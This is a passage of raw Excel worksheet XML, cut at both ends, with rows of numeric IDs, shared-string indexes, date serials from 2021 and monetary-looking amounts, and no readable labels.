        <v>62000</v>
      </c>
      <c r="J4370" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4371" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4371">
        <v>24890</v>
      </c>
      <c r="B4371">
        <v>88</v>
      </c>
      <c r="C4371" t="s">
        <v>73</v>
      </c>
      <c r="D4371" t="s">
        <v>9516</v>
      </c>
      <c r="E4371">
        <v>14</v>
      </c>
      <c r="F4371" t="s">
        <v>1746</v>
      </c>
      <c r="G4371" s="1">
        <v>44341</v>
      </c>
      <c r="H4371">
        <v>13000</v>
      </c>
      <c r="J4371" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4372" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4372">
        <v>24903</v>
      </c>
      <c r="B4372">
        <v>5535</v>
      </c>
      <c r="C4372" t="s">
        <v>4000</v>
      </c>
      <c r="D4372" t="s">
        <v>13564</v>
      </c>
      <c r="E4372">
        <v>17</v>
      </c>
      <c r="F4372" t="s">
        <v>4686</v>
      </c>
      <c r="G4372" s="1">
        <v>44292</v>
      </c>
      <c r="H4372">
        <v>50000</v>
      </c>
      <c r="I4372" t="s">
        <v>12942</v>
      </c>
      <c r="J4372" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4373" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4373">
        <v>24904</v>
      </c>
      <c r="B4373">
        <v>5535</v>
      </c>
      <c r="C4373" t="s">
        <v>4000</v>
      </c>
      <c r="D4373" t="s">
        <v>13564</v>
      </c>
      <c r="E4373">
        <v>17</v>
      </c>
      <c r="F4373" t="s">
        <v>2236</v>
      </c>
      <c r="G4373" s="1">
        <v>44292</v>
      </c>
      <c r="H4373">
        <v>50000</v>
      </c>
      <c r="I4373" t="s">
        <v>12942</v>
      </c>
      <c r="J4373" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4374" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4374">
        <v>24905</v>
      </c>
      <c r="B4374">
        <v>5535</v>
      </c>
      <c r="C4374" t="s">
        <v>4000</v>
      </c>
      <c r="D4374" t="s">
        <v>13564</v>
      </c>
      <c r="E4374">
        <v>17</v>
      </c>
      <c r="F4374" t="s">
        <v>13565</v>
      </c>
      <c r="G4374" s="1">
        <v>44292</v>
      </c>
      <c r="H4374">
        <v>50000</v>
      </c>
      <c r="I4374" t="s">
        <v>12942</v>
      </c>
      <c r="J4374" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4375" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4375">
        <v>24906</v>
      </c>
      <c r="B4375">
        <v>5535</v>
      </c>
      <c r="C4375" t="s">
        <v>4000</v>
      </c>
      <c r="D4375" t="s">
        <v>13564</v>
      </c>
      <c r="E4375">
        <v>17</v>
      </c>
      <c r="F4375" t="s">
        <v>11837</v>
      </c>
      <c r="G4375" s="1">
        <v>44292</v>
      </c>
      <c r="H4375">
        <v>50000</v>
      </c>
      <c r="I4375" t="s">
        <v>12942</v>
      </c>
      <c r="J4375" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4376" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4376">
        <v>24907</v>
      </c>
      <c r="B4376">
        <v>5535</v>
      </c>
      <c r="C4376" t="s">
        <v>4000</v>
      </c>
      <c r="D4376" t="s">
        <v>13564</v>
      </c>
      <c r="E4376">
        <v>17</v>
      </c>
      <c r="F4376" t="s">
        <v>13566</v>
      </c>
      <c r="G4376" s="1">
        <v>44292</v>
      </c>
      <c r="H4376">
        <v>50000</v>
      </c>
      <c r="I4376" t="s">
        <v>12942</v>
      </c>
      <c r="J4376" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4377" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4377">
        <v>24908</v>
      </c>
      <c r="B4377">
        <v>5535</v>
      </c>
      <c r="C4377" t="s">
        <v>4000</v>
      </c>
      <c r="D4377" t="s">
        <v>13564</v>
      </c>
      <c r="E4377">
        <v>17</v>
      </c>
      <c r="F4377" t="s">
        <v>13567</v>
      </c>
      <c r="G4377" s="1">
        <v>44292</v>
      </c>
      <c r="H4377">
        <v>50000</v>
      </c>
      <c r="I4377" t="s">
        <v>12942</v>
      </c>
      <c r="J4377" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4378" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4378">
        <v>24909</v>
      </c>
      <c r="B4378">
        <v>5535</v>
      </c>
      <c r="C4378" t="s">
        <v>4000</v>
      </c>
      <c r="D4378" t="s">
        <v>13564</v>
      </c>
      <c r="E4378">
        <v>17</v>
      </c>
      <c r="F4378" t="s">
        <v>9437</v>
      </c>
      <c r="G4378" s="1">
        <v>44292</v>
      </c>
      <c r="H4378">
        <v>50000</v>
      </c>
      <c r="I4378" t="s">
        <v>12942</v>
      </c>
      <c r="J4378" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="4379" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4379">
        <v>24910</v>
      </c>
      <c r="B4379">
        <v>5492</v>
      </c>
      <c r="C4379" t="s">
        <v>8839</v>
      </c>
      <c r="D4379" t="s">
        <v>13568</v>
      </c>
      <c r="E4379">
        <v>26</v>
      </c>
      <c r="F4379" t="s">
        <v>9527</v>
      </c>
      <c r="G4379" s="1">
        <v>44299</v>
      </c>
      <c r="H4379">
        <v>100000</v>
      </c>
      <c r="I4379" t="s">
        <v>9522</v>
      </c>
    </row>
    <row r="4380" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4380">
        <v>24911</v>
      </c>
      <c r="B4380">
        <v>5492</v>
      </c>
      <c r="C4380" t="s">
        <v>8839</v>
      </c>
      <c r="D4380" t="s">
        <v>13568</v>
      </c>
      <c r="E4380">
        <v>26</v>
      </c>
      <c r="F4380" t="s">
        <v>9585</v>
      </c>
      <c r="G4380" s="1">
        <v>44299</v>
      </c>
      <c r="H4380">
        <v>180000</v>
      </c>
      <c r="I4380" t="s">
        <v>9522</v>
      </c>
      <c r="J4380" t="s">
        <v>10379</v>
      </c>
    </row>
    <row r="4381" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4381">
        <v>24912</v>
      </c>
      <c r="B4381">
        <v>5492</v>
      </c>
      <c r="C4381" t="s">
        <v>8839</v>
      </c>
      <c r="D4381" t="s">
        <v>13568</v>
      </c>
      <c r="E4381">
        <v>26</v>
      </c>
      <c r="F4381" t="s">
        <v>13569</v>
      </c>
      <c r="G4381" s="1">
        <v>44299</v>
      </c>
      <c r="H4381">
        <v>150000</v>
      </c>
      <c r="I4381" t="s">
        <v>9522</v>
      </c>
      <c r="J4381" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4382" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4382">
        <v>24913</v>
      </c>
      <c r="B4382">
        <v>5166</v>
      </c>
      <c r="C4382" t="s">
        <v>8722</v>
      </c>
      <c r="D4382" t="s">
        <v>13465</v>
      </c>
      <c r="E4382">
        <v>17</v>
      </c>
      <c r="F4382" t="s">
        <v>4686</v>
      </c>
      <c r="G4382" s="1">
        <v>44341</v>
      </c>
      <c r="H4382">
        <v>0</v>
      </c>
      <c r="I4382" t="s">
        <v>11192</v>
      </c>
      <c r="J4382" t="s">
        <v>13570</v>
      </c>
    </row>
    <row r="4383" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4383">
        <v>24914</v>
      </c>
      <c r="B4383">
        <v>5452</v>
      </c>
      <c r="C4383" t="s">
        <v>16546</v>
      </c>
      <c r="D4383" t="s">
        <v>16547</v>
      </c>
      <c r="E4383">
        <v>12</v>
      </c>
      <c r="F4383" t="s">
        <v>13571</v>
      </c>
      <c r="G4383" s="1">
        <v>44351</v>
      </c>
      <c r="H4383" s="4">
        <v>1000</v>
      </c>
      <c r="I4383" t="s">
        <v>10029</v>
      </c>
      <c r="J4383" t="s">
        <v>13572</v>
      </c>
    </row>
    <row r="4384" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4384">
        <v>24921</v>
      </c>
      <c r="B4384">
        <v>5278</v>
      </c>
      <c r="C4384" t="s">
        <v>8627</v>
      </c>
      <c r="D4384" t="s">
        <v>13573</v>
      </c>
      <c r="E4384">
        <v>28</v>
      </c>
      <c r="F4384" t="s">
        <v>3341</v>
      </c>
      <c r="G4384" s="1">
        <v>44340</v>
      </c>
      <c r="H4384">
        <v>50</v>
      </c>
      <c r="I4384" t="s">
        <v>13574</v>
      </c>
    </row>
    <row r="4385" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4385">
        <v>24932</v>
      </c>
      <c r="B4385">
        <v>80</v>
      </c>
      <c r="C4385" t="s">
        <v>1543</v>
      </c>
      <c r="D4385" t="s">
        <v>11197</v>
      </c>
      <c r="E4385">
        <v>12</v>
      </c>
      <c r="F4385" t="s">
        <v>8913</v>
      </c>
      <c r="G4385" s="1">
        <v>44298</v>
      </c>
      <c r="H4385">
        <v>300000</v>
      </c>
      <c r="I4385" t="s">
        <v>13575</v>
      </c>
    </row>
    <row r="4386" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4386">
        <v>24933</v>
      </c>
      <c r="B4386">
        <v>5435</v>
      </c>
      <c r="C4386" t="s">
        <v>8634</v>
      </c>
      <c r="D4386" t="s">
        <v>13262</v>
      </c>
      <c r="E4386">
        <v>26</v>
      </c>
      <c r="F4386" t="s">
        <v>9595</v>
      </c>
      <c r="G4386" s="1">
        <v>44287</v>
      </c>
      <c r="H4386">
        <v>50000</v>
      </c>
      <c r="I4386" t="s">
        <v>9522</v>
      </c>
      <c r="J4386" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4387" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4387">
        <v>24934</v>
      </c>
      <c r="B4387">
        <v>2155</v>
      </c>
      <c r="C4387" t="s">
        <v>5100</v>
      </c>
      <c r="D4387" t="s">
        <v>10025</v>
      </c>
      <c r="E4387">
        <v>26</v>
      </c>
      <c r="F4387" t="s">
        <v>13576</v>
      </c>
      <c r="G4387" s="1">
        <v>44280</v>
      </c>
      <c r="H4387">
        <v>90000</v>
      </c>
      <c r="J4387" t="s">
        <v>13577</v>
      </c>
    </row>
    <row r="4388" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4388">
        <v>24936</v>
      </c>
      <c r="B4388">
        <v>1160</v>
      </c>
      <c r="C4388" t="s">
        <v>2967</v>
      </c>
      <c r="D4388" t="s">
        <v>9848</v>
      </c>
      <c r="E4388">
        <v>16</v>
      </c>
      <c r="F4388" t="s">
        <v>364</v>
      </c>
      <c r="G4388" s="1">
        <v>44372</v>
      </c>
      <c r="H4388">
        <v>2400000</v>
      </c>
      <c r="I4388" t="s">
        <v>12897</v>
      </c>
      <c r="J4388" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4389" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4389">
        <v>24937</v>
      </c>
      <c r="B4389">
        <v>5115</v>
      </c>
      <c r="C4389" t="s">
        <v>8155</v>
      </c>
      <c r="D4389" t="s">
        <v>13578</v>
      </c>
      <c r="E4389">
        <v>26</v>
      </c>
      <c r="F4389" t="s">
        <v>3499</v>
      </c>
      <c r="G4389" s="1">
        <v>44327</v>
      </c>
      <c r="H4389">
        <v>20000</v>
      </c>
      <c r="I4389" t="s">
        <v>13579</v>
      </c>
      <c r="J4389" t="s">
        <v>13580</v>
      </c>
    </row>
    <row r="4390" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4390">
        <v>24938</v>
      </c>
      <c r="B4390">
        <v>5115</v>
      </c>
      <c r="C4390" t="s">
        <v>8155</v>
      </c>
      <c r="D4390" t="s">
        <v>13581</v>
      </c>
      <c r="E4390">
        <v>26</v>
      </c>
      <c r="F4390" t="s">
        <v>9497</v>
      </c>
      <c r="G4390" s="1">
        <v>44327</v>
      </c>
      <c r="H4390">
        <v>10000</v>
      </c>
      <c r="I4390" t="s">
        <v>13582</v>
      </c>
      <c r="J4390" t="s">
        <v>13583</v>
      </c>
    </row>
    <row r="4391" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4391">
        <v>24945</v>
      </c>
      <c r="B4391">
        <v>5523</v>
      </c>
      <c r="C4391" t="s">
        <v>2152</v>
      </c>
      <c r="D4391" t="s">
        <v>13584</v>
      </c>
      <c r="E4391">
        <v>11</v>
      </c>
      <c r="F4391" t="s">
        <v>2924</v>
      </c>
      <c r="G4391" s="1">
        <v>44355</v>
      </c>
      <c r="H4391">
        <v>100000</v>
      </c>
      <c r="I4391" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4392" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4392">
        <v>24946</v>
      </c>
      <c r="B4392">
        <v>5523</v>
      </c>
      <c r="C4392" t="s">
        <v>2152</v>
      </c>
      <c r="D4392" t="s">
        <v>13584</v>
      </c>
      <c r="E4392">
        <v>11</v>
      </c>
      <c r="F4392" t="s">
        <v>9438</v>
      </c>
      <c r="G4392" s="1">
        <v>44355</v>
      </c>
      <c r="H4392">
        <v>50000</v>
      </c>
      <c r="I4392" t="s">
        <v>13585</v>
      </c>
    </row>
    <row r="4393" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4393">
        <v>24947</v>
      </c>
      <c r="B4393">
        <v>5523</v>
      </c>
      <c r="C4393" t="s">
        <v>2152</v>
      </c>
      <c r="D4393" t="s">
        <v>13584</v>
      </c>
      <c r="E4393">
        <v>11</v>
      </c>
      <c r="F4393" t="s">
        <v>9577</v>
      </c>
      <c r="G4393" s="1">
        <v>44355</v>
      </c>
      <c r="H4393">
        <v>50000</v>
      </c>
      <c r="I4393" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4394" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4394">
        <v>24948</v>
      </c>
      <c r="B4394">
        <v>5523</v>
      </c>
      <c r="C4394" t="s">
        <v>2152</v>
      </c>
      <c r="D4394" t="s">
        <v>13584</v>
      </c>
      <c r="E4394">
        <v>11</v>
      </c>
      <c r="F4394" t="s">
        <v>9435</v>
      </c>
      <c r="G4394" s="1">
        <v>44355</v>
      </c>
      <c r="H4394">
        <v>50000</v>
      </c>
      <c r="I4394" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4395" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4395">
        <v>24949</v>
      </c>
      <c r="B4395">
        <v>5523</v>
      </c>
      <c r="C4395" t="s">
        <v>2152</v>
      </c>
      <c r="D4395" t="s">
        <v>13584</v>
      </c>
      <c r="E4395">
        <v>11</v>
      </c>
      <c r="F4395" t="s">
        <v>9676</v>
      </c>
      <c r="G4395" s="1">
        <v>44355</v>
      </c>
      <c r="H4395">
        <v>50000</v>
      </c>
      <c r="I4395" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4396" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4396">
        <v>24950</v>
      </c>
      <c r="B4396">
        <v>5523</v>
      </c>
      <c r="C4396" t="s">
        <v>2152</v>
      </c>
      <c r="D4396" t="s">
        <v>13584</v>
      </c>
      <c r="E4396">
        <v>11</v>
      </c>
      <c r="F4396" t="s">
        <v>9561</v>
      </c>
      <c r="G4396" s="1">
        <v>44355</v>
      </c>
      <c r="H4396">
        <v>50000</v>
      </c>
      <c r="I4396" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4397" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4397">
        <v>24951</v>
      </c>
      <c r="B4397">
        <v>5523</v>
      </c>
      <c r="C4397" t="s">
        <v>2152</v>
      </c>
      <c r="D4397" t="s">
        <v>13584</v>
      </c>
      <c r="E4397">
        <v>11</v>
      </c>
      <c r="F4397" t="s">
        <v>9595</v>
      </c>
      <c r="G4397" s="1">
        <v>44355</v>
      </c>
      <c r="H4397">
        <v>50000</v>
      </c>
      <c r="I4397" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4398" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4398">
        <v>24952</v>
      </c>
      <c r="B4398">
        <v>5523</v>
      </c>
      <c r="C4398" t="s">
        <v>2152</v>
      </c>
      <c r="D4398" t="s">
        <v>13584</v>
      </c>
      <c r="E4398">
        <v>11</v>
      </c>
      <c r="F4398" t="s">
        <v>9928</v>
      </c>
      <c r="G4398" s="1">
        <v>44355</v>
      </c>
      <c r="H4398">
        <v>50000</v>
      </c>
      <c r="I4398" t="s">
        <v>13511</v>
      </c>
    </row>
    <row r="4399" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4399">
        <v>24954</v>
      </c>
      <c r="B4399">
        <v>5101</v>
      </c>
      <c r="C4399" t="s">
        <v>7948</v>
      </c>
      <c r="D4399" t="s">
        <v>12424</v>
      </c>
      <c r="E4399">
        <v>16</v>
      </c>
      <c r="F4399" t="s">
        <v>13586</v>
      </c>
      <c r="G4399" s="1">
        <v>44281</v>
      </c>
      <c r="H4399">
        <v>120</v>
      </c>
      <c r="I4399" t="s">
        <v>13587</v>
      </c>
    </row>
    <row r="4400" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4400">
        <v>24955</v>
      </c>
      <c r="B4400">
        <v>1715</v>
      </c>
      <c r="C4400" t="s">
        <v>2595</v>
      </c>
      <c r="D4400" t="s">
        <v>9990</v>
      </c>
      <c r="E4400">
        <v>10</v>
      </c>
      <c r="F4400" t="s">
        <v>9433</v>
      </c>
      <c r="G4400" s="1">
        <v>44312</v>
      </c>
      <c r="H4400">
        <v>10000</v>
      </c>
      <c r="J4400" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4401" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4401">
        <v>24956</v>
      </c>
      <c r="B4401">
        <v>1492</v>
      </c>
      <c r="C4401" t="s">
        <v>4577</v>
      </c>
      <c r="D4401" t="s">
        <v>13588</v>
      </c>
      <c r="E4401">
        <v>12</v>
      </c>
      <c r="F4401" t="s">
        <v>2924</v>
      </c>
      <c r="G4401" s="1">
        <v>44343</v>
      </c>
      <c r="H4401">
        <v>200000</v>
      </c>
      <c r="I4401" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4402" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4402">
        <v>24957</v>
      </c>
      <c r="B4402">
        <v>1799</v>
      </c>
      <c r="C4402" t="s">
        <v>6492</v>
      </c>
      <c r="D4402" t="s">
        <v>13589</v>
      </c>
      <c r="E4402">
        <v>26</v>
      </c>
      <c r="F4402" t="s">
        <v>364</v>
      </c>
      <c r="G4402" s="1">
        <v>44307</v>
      </c>
      <c r="H4402">
        <v>21600000</v>
      </c>
      <c r="J4402" t="s">
        <v>13590</v>
      </c>
    </row>
    <row r="4403" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4403">
        <v>24961</v>
      </c>
      <c r="B4403">
        <v>1386</v>
      </c>
      <c r="C4403" t="s">
        <v>4123</v>
      </c>
      <c r="D4403" t="s">
        <v>13201</v>
      </c>
      <c r="E4403">
        <v>13</v>
      </c>
      <c r="F4403" t="s">
        <v>10478</v>
      </c>
      <c r="G4403" s="1">
        <v>44291</v>
      </c>
      <c r="H4403">
        <v>500</v>
      </c>
      <c r="I4403" t="s">
        <v>13591</v>
      </c>
    </row>
    <row r="4404" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4404">
        <v>24962</v>
      </c>
      <c r="B4404">
        <v>1386</v>
      </c>
      <c r="C4404" t="s">
        <v>4123</v>
      </c>
      <c r="D4404" t="s">
        <v>13201</v>
      </c>
      <c r="E4404">
        <v>13</v>
      </c>
      <c r="F4404" t="s">
        <v>13592</v>
      </c>
      <c r="G4404" s="1">
        <v>44291</v>
      </c>
      <c r="H4404">
        <v>100</v>
      </c>
      <c r="I4404" t="s">
        <v>13593</v>
      </c>
    </row>
    <row r="4405" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4405">
        <v>24966</v>
      </c>
      <c r="B4405">
        <v>1621</v>
      </c>
      <c r="C4405" t="s">
        <v>4586</v>
      </c>
      <c r="D4405" t="s">
        <v>13594</v>
      </c>
      <c r="E4405">
        <v>5</v>
      </c>
      <c r="F4405" t="s">
        <v>364</v>
      </c>
      <c r="G4405" s="1">
        <v>44351</v>
      </c>
      <c r="H4405">
        <v>130000</v>
      </c>
      <c r="J4405" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4406" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4406">
        <v>24967</v>
      </c>
      <c r="B4406">
        <v>5283</v>
      </c>
      <c r="C4406" t="s">
        <v>8462</v>
      </c>
      <c r="D4406" t="s">
        <v>13595</v>
      </c>
      <c r="E4406">
        <v>17</v>
      </c>
      <c r="F4406" t="s">
        <v>9925</v>
      </c>
      <c r="G4406" s="1">
        <v>44322</v>
      </c>
      <c r="H4406">
        <v>12000</v>
      </c>
      <c r="I4406" t="s">
        <v>10892</v>
      </c>
    </row>
    <row r="4407" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4407">
        <v>24968</v>
      </c>
      <c r="B4407">
        <v>5283</v>
      </c>
      <c r="C4407" t="s">
        <v>8462</v>
      </c>
      <c r="D4407" t="s">
        <v>13595</v>
      </c>
      <c r="E4407">
        <v>17</v>
      </c>
      <c r="F4407" t="s">
        <v>13596</v>
      </c>
      <c r="G4407" s="1">
        <v>44322</v>
      </c>
      <c r="H4407">
        <v>12000</v>
      </c>
      <c r="I4407" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4408" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4408">
        <v>24969</v>
      </c>
      <c r="B4408">
        <v>5283</v>
      </c>
      <c r="C4408" t="s">
        <v>8462</v>
      </c>
      <c r="D4408" t="s">
        <v>13595</v>
      </c>
      <c r="E4408">
        <v>17</v>
      </c>
      <c r="F4408" t="s">
        <v>13597</v>
      </c>
      <c r="G4408" s="1">
        <v>44322</v>
      </c>
      <c r="H4408">
        <v>12000</v>
      </c>
      <c r="I4408" t="s">
        <v>13598</v>
      </c>
    </row>
    <row r="4409" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4409">
        <v>24970</v>
      </c>
      <c r="B4409">
        <v>1840</v>
      </c>
      <c r="C4409" t="s">
        <v>6498</v>
      </c>
      <c r="D4409" t="s">
        <v>13599</v>
      </c>
      <c r="E4409">
        <v>26</v>
      </c>
      <c r="F4409" t="s">
        <v>364</v>
      </c>
      <c r="G4409" s="1">
        <v>44326</v>
      </c>
      <c r="H4409">
        <v>50000</v>
      </c>
      <c r="J4409" t="s">
        <v>13600</v>
      </c>
    </row>
    <row r="4410" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4410">
        <v>24971</v>
      </c>
      <c r="B4410">
        <v>4908</v>
      </c>
      <c r="C4410" t="s">
        <v>7504</v>
      </c>
      <c r="D4410" t="s">
        <v>11787</v>
      </c>
      <c r="E4410">
        <v>24</v>
      </c>
      <c r="F4410" t="s">
        <v>9929</v>
      </c>
      <c r="G4410" s="1">
        <v>44344</v>
      </c>
      <c r="H4410">
        <v>64800</v>
      </c>
      <c r="I4410" t="s">
        <v>13601</v>
      </c>
      <c r="J4410" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4411" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4411">
        <v>24972</v>
      </c>
      <c r="B4411">
        <v>1715</v>
      </c>
      <c r="C4411" t="s">
        <v>2595</v>
      </c>
      <c r="D4411" t="s">
        <v>9990</v>
      </c>
      <c r="E4411">
        <v>10</v>
      </c>
      <c r="F4411" t="s">
        <v>9681</v>
      </c>
      <c r="G4411" s="1">
        <v>44312</v>
      </c>
      <c r="H4411">
        <v>6000</v>
      </c>
      <c r="J4411" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4412" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4412">
        <v>24978</v>
      </c>
      <c r="B4412">
        <v>2429</v>
      </c>
      <c r="C4412" t="s">
        <v>6042</v>
      </c>
      <c r="D4412" t="s">
        <v>13602</v>
      </c>
      <c r="E4412">
        <v>2</v>
      </c>
      <c r="F4412" t="s">
        <v>13603</v>
      </c>
      <c r="G4412" s="1">
        <v>44300</v>
      </c>
      <c r="H4412">
        <v>400000</v>
      </c>
      <c r="I4412" t="s">
        <v>13604</v>
      </c>
      <c r="J4412" t="s">
        <v>13605</v>
      </c>
    </row>
    <row r="4413" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4413">
        <v>24979</v>
      </c>
      <c r="B4413">
        <v>2429</v>
      </c>
      <c r="C4413" t="s">
        <v>6042</v>
      </c>
      <c r="D4413" t="s">
        <v>13602</v>
      </c>
      <c r="E4413">
        <v>2</v>
      </c>
      <c r="F4413" t="s">
        <v>9437</v>
      </c>
      <c r="G4413" s="1">
        <v>44300</v>
      </c>
      <c r="H4413">
        <v>600000</v>
      </c>
      <c r="I4413" t="s">
        <v>12178</v>
      </c>
      <c r="J4413" t="s">
        <v>13606</v>
      </c>
    </row>
    <row r="4414" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4414">
        <v>24980</v>
      </c>
      <c r="B4414">
        <v>2429</v>
      </c>
      <c r="C4414" t="s">
        <v>6042</v>
      </c>
      <c r="D4414" t="s">
        <v>13602</v>
      </c>
      <c r="E4414">
        <v>2</v>
      </c>
      <c r="F4414" t="s">
        <v>13607</v>
      </c>
      <c r="G4414" s="1">
        <v>44300</v>
      </c>
      <c r="H4414">
        <v>600000</v>
      </c>
      <c r="I4414" t="s">
        <v>9603</v>
      </c>
      <c r="J4414" t="s">
        <v>13608</v>
      </c>
    </row>
    <row r="4415" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4415">
        <v>24981</v>
      </c>
      <c r="B4415">
        <v>2429</v>
      </c>
      <c r="C4415" t="s">
        <v>6042</v>
      </c>
      <c r="D4415" t="s">
        <v>13602</v>
      </c>
      <c r="E4415">
        <v>2</v>
      </c>
      <c r="F4415" t="s">
        <v>13609</v>
      </c>
      <c r="G4415" s="1">
        <v>44300</v>
      </c>
      <c r="H4415">
        <v>100000</v>
      </c>
      <c r="I4415" t="s">
        <v>9603</v>
      </c>
      <c r="J4415" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4416" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4416">
        <v>24982</v>
      </c>
      <c r="B4416">
        <v>2429</v>
      </c>
      <c r="C4416" t="s">
        <v>6042</v>
      </c>
      <c r="D4416" t="s">
        <v>13602</v>
      </c>
      <c r="E4416">
        <v>2</v>
      </c>
      <c r="F4416" t="s">
        <v>9527</v>
      </c>
      <c r="G4416" s="1">
        <v>44300</v>
      </c>
      <c r="H4416">
        <v>100000</v>
      </c>
      <c r="J4416" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4417" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4417">
        <v>24983</v>
      </c>
      <c r="B4417">
        <v>2429</v>
      </c>
      <c r="C4417" t="s">
        <v>6042</v>
      </c>
      <c r="D4417" t="s">
        <v>13602</v>
      </c>
      <c r="E4417">
        <v>2</v>
      </c>
      <c r="F4417" t="s">
        <v>9577</v>
      </c>
      <c r="G4417" s="1">
        <v>44300</v>
      </c>
      <c r="H4417">
        <v>50000</v>
      </c>
      <c r="J4417" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="4418" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4418">
        <v>24984</v>
      </c>
      <c r="B4418">
        <v>1713</v>
      </c>
      <c r="C4418" t="s">
        <v>2878</v>
      </c>
      <c r="D4418" t="s">
        <v>13610</v>
      </c>
      <c r="E4418">
        <v>16</v>
      </c>
      <c r="F4418" t="s">
        <v>2236</v>
      </c>
      <c r="G4418" s="1">
        <v>44316</v>
      </c>
      <c r="H4418">
        <v>800000</v>
      </c>
      <c r="I4418" t="s">
        <v>13611</v>
      </c>
    </row>
    <row r="4419" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4419">
        <v>24985</v>
      </c>
      <c r="B4419">
        <v>1713</v>
      </c>
      <c r="C4419" t="s">
        <v>2878</v>
      </c>
      <c r="D4419" t="s">
        <v>13610</v>
      </c>
      <c r="E4419">
        <v>16</v>
      </c>
      <c r="F4419" t="s">
        <v>11202</v>
      </c>
      <c r="G4419" s="1">
        <v>44316</v>
      </c>
      <c r="H4419">
        <v>800000</v>
      </c>
      <c r="I4419" t="s">
        <v>13611</v>
      </c>
    </row>
    <row r="4420" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4420">
        <v>24986</v>
      </c>
      <c r="B4420">
        <v>5477</v>
      </c>
      <c r="C4420" t="s">
        <v>3535</v>
      </c>
      <c r="D4420" t="s">
        <v>13612</v>
      </c>
      <c r="E4420">
        <v>27</v>
      </c>
      <c r="F4420" t="s">
        <v>1746</v>
      </c>
      <c r="G4420" s="1">
        <v>44378</v>
      </c>
      <c r="H4420">
        <v>50000</v>
      </c>
      <c r="J4420" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4421" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4421">
        <v>24988</v>
      </c>
      <c r="B4421">
        <v>5477</v>
      </c>
      <c r="C4421" t="s">
        <v>3535</v>
      </c>
      <c r="D4421" t="s">
        <v>13612</v>
      </c>
      <c r="E4421">
        <v>27</v>
      </c>
      <c r="F4421" t="s">
        <v>13613</v>
      </c>
      <c r="G4421" s="1">
        <v>44378</v>
      </c>
      <c r="H4421">
        <v>300000</v>
      </c>
      <c r="J4421" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4422" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4422">
        <v>24989</v>
      </c>
      <c r="B4422">
        <v>5477</v>
      </c>
      <c r="C4422" t="s">
